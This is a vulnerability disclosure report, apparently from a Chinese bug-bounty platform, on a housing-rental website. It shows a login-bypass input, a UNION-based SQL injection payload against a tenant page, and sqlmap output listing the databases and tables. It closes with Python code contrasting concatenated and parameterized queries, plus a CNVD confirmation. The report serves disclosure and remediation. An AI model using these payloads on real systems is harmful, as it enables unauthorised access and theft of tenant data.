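2015-11-06: Details reported to the vendor; awaiting vendor handling
2015-11-10: Vendor confirmed; details disclosed to the vendor only
2015-11-20: Details disclosed to core white hats and experts in related fields
2015-11-30: Details disclosed to regular white hats
2015-12-10: Details disclosed to intern white hats
2015-12-25: Details disclosed to the public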
**.**.**.**:8081/login.aspx
Account: admin' or '1'='1
Password: anything
Injection point
**.**.**.**:8081/tenant.aspx?houseid=2035&id=3637&action=edit
Payload: houseid=2035&id=-5718' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(88)+CHAR(106)+CHAR(113)+CHAR(105)+CHAR(105)+CHAR(106)+CHAR(78)+CHAR(107)+CHAR(88)+CHAR(120)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(106)+CHAR(113),NULL-- &action=edit
---
[13:59:08] [INFO] testing Microsoft SQL Server
[13:59:08] [INFO] confirming Microsoft SQL Server
[13:59:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[13:59:09] [INFO] fetching database names
[13:59:09] [INFO] the SQL query used returns 8 entries
[13:59:09] [INFO] retrieved: ljhouse
[13:59:10] [INFO] retrieved: master
[13:59:10] [INFO] retrieved: model
[13:59:10] [INFO] retrieved: msdb
[13:59:10] [INFO] retrieved: ReportServer
[13:59:10] [INFO] retrieved: ReportServerTempDB
[13:59:11] [INFO] retrieved: tempdb
[13:59:11] [INFO] retrieved: zpbigdata
available databases [8]:
[*] ljhouse
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] zpbigdata
Payload: houseid=2035&id=-5718' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(88)+CHAR(106)+CHAR(113)+CHAR(105)+CHAR(105)+CHAR(106)+CHAR(78)+CHAR(107)+CHAR(88)+CHAR(120)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(106)+CHAR(113),NULL-- &action=edit
---
[14:00:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[14:00:00] [INFO] fetching tables for database: ljhouse
[14:00:01] [INFO] the SQL query used returns 17 entries
[14:00:01] [INFO] retrieved: dbo.city
[14:00:01] [INFO] retrieved: dbo.house
[14:00:01] [INFO] retrieved: dbo.ht
[14:00:01] [INFO] retrieved: dbo.landlord
[14:00:02] [INFO] retrieved: dbo.needhouse
[14:00:02] [INFO] retrieved: dbo.provincial
[14:00:02] [INFO] retrieved: dbo.sys_area
[14:00:05] [INFO] retrieved: dbo.sys_depart
[14:00:05] [INFO] retrieved: dbo.sys_dict
[14:00:06] [INFO] retrieved: dbo.sys_login_lj
[14:00:06] [INFO] retrieved: dbo.sys_serverStation
[14:00:06] [INFO] retrieved: dbo.sys_user
[14:00:06] [INFO] retrieved: dbo.sys_visitEven
[14:00:06] [INFO] retrieved: dbo.sysdiagrams
[14:00:07] [INFO] retrieved: dbo.tenant
[14:00:07] [INFO] retrieved: dbo.visitqk
[14:00:08] [INFO] retrieved: dbo.visitqk
Database: ljhouse
[17 tables]
+-------------------+
| city              |
| house             |
| ht                |
| landlord          |
| needhouse         |
| provincial        |
| sys_area          |
| sys_depart        |
| sys_dict          |
| sys_login_lj      |
| sys_serverStation |
| sys_user          |
| sys_visitEven     |
| sysdiagrams       |
| tenant            |
| visitqk           |
| visitqk           |
+-------------------+
Filter SQL special characters
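Both findings above (the login form and the id parameter of tenant.aspx) behave the way dynamically concatenated SQL does. The following is an added example, not code from the affected application: it uses Python with an in-memory SQLite database as a stand-in for the ASP.NET / SQL Server stack, and shows the concatenated login query accepting the reported input while the parameterized form rejects it. The column names, rows and function names are constructed assumptions.

```python
import re
import sqlite3

def make_db():
    # Constructed in-memory stand-in; column names and rows are assumptions.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE sys_user (name TEXT, pwd TEXT);
        INSERT INTO sys_user VALUES ('admin', 'constructed-secret');
        CREATE TABLE tenant (id INTEGER, houseid INTEGER, name TEXT);
        INSERT INTO tenant VALUES (3637, 2035, 'constructed tenant');
    """)
    return db

def login_concat(db, user, pwd):
    # Vulnerable pattern: input is spliced into the statement text, so a
    # quote in `user` ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT COUNT(*) FROM sys_user "
           "WHERE name='%s' AND pwd='%s'" % (user, pwd))
    return db.execute(sql).fetchone()[0] > 0

def login_param(db, user, pwd):
    # Hardened: values are bound as data and never reach the SQL parser.
    # (A real system would compare a salted password hash, not plaintext.)
    sql = "SELECT COUNT(*) FROM sys_user WHERE name=? AND pwd=?"
    return db.execute(sql, (user, pwd)).fetchone()[0] > 0

_INT = re.compile(r"[0-9]{1,9}")

def get_tenant(db, houseid, tenant_id):
    # Numeric query-string parameters: allow-list the format, convert,
    # then still bind them rather than formatting them into the statement.
    if not (_INT.fullmatch(houseid) and _INT.fullmatch(tenant_id)):
        raise ValueError("houseid and id must be plain integers")
    sql = "SELECT id, houseid, name FROM tenant WHERE houseid=? AND id=?"
    return db.execute(sql, (int(houseid), int(tenant_id))).fetchone()

if __name__ == "__main__":
    db = make_db()
    bypass = "admin' or '1'='1"  # login input quoted in the report
    print("concatenated:", login_concat(db, bypass, "anything"))
    print("parameterized:", login_param(db, bypass, "anything"))
    print("tenant lookup:", get_tenant(db, "2035", "3637"))
```

In ASP.NET the equivalent of the bound form is a SqlCommand with SqlParameter values instead of string concatenation.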
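Severity: High
Vulnerability Rank: 10
Confirmed: 2015-11-10 10:36
CNVD confirmed and reproduced the reported vulnerability and has forwarded it to CNCERT for dispatch to the Jiangsu sub-center, which will follow up and coordinate with the organization operating the website on remediation.
None yet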